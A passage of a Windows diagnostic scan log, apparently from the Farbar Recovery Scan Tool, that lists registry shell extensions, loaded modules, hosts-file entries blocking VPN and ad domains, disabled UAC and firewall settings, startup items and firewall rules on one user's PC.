CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2013-02-20 21:31 - 2006-12-11 02:14 - 000043008 _____ () [File not signed] C:\Program Files (x86)\WinRar\rarext64.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-06-26 13:08 - 2012-06-26 13:08 - 000026112 _____ (Nokia) [File not signed] C:\Program Files (x86)\Nokia\Nokia PC Suite 7\Lang\PhoneBrowser_eng-us.nlr
2012-06-26 11:58 - 2012-06-26 11:58 - 001262592 _____ (Nokia) [File not signed] C:\Program Files (x86)\Nokia\Nokia PC Suite 7\NGSCM64.DLL
2012-06-26 13:08 - 2012-06-26 13:08 - 000572928 _____ (Nokia) [File not signed] C:\Program Files (x86)\Nokia\Nokia PC Suite 7\Resource\PhoneBrowser_Nokia.ngr
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-09 17:42 - 000002330 ____R C:\Windows\system32\drivers\etc\hosts
0.0.0.0 hss.hsselite.com
0.0.0.0 www.hss.hsselite.com
0.0.0.0 d1v9mrqde8r3oj.cloudfront.net
0.0.0.0 www.d1v9mrqde8r3oj.cloudfront.net
0.0.0.0 api.hsselite.com
0.0.0.0 www.api.hsselite.com
0.0.0.0 hsselite.com/trial/step2.php
0.0.0.0 www.hsselite.com/trial/step2.php
0.0.0.0 anchorfree.com
0.0.0.0 www.anchorfree.com
0.0.0.0 box.anchorfree.net
0.0.0.0 www.box.anchorfree.net
0.0.0.0 rpt.anchorfree.net
0.0.0.0 www.rpt.anchorfree.net
0.0.0.0 123.box.anchorfree.net
0.0.0.0 www.123.box.anchorfree.net
0.0.0.0 anchorfree.us
0.0.0.0 www.anchorfree.us
0.0.0.0 delivery.anchorfree.us/land.php
0.0.0.0 www.delivery.anchorfree.us/land.php
0.0.0.0 rss2search.com
0.0.0.0 www.rss2search.com
0.0.0.0 mefeedia.com
0.0.0.0 www.mefeedia.com
0.0.0.0 a433.com
0.0.0.0 www.a433.com
0.0.0.0 techbrowsing.com
0.0.0.0 www.techbrowsing.com
0.0.0.0 techbrowsing.com/away.php
0.0.0.0 www.techbrowsing.com/away.php
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
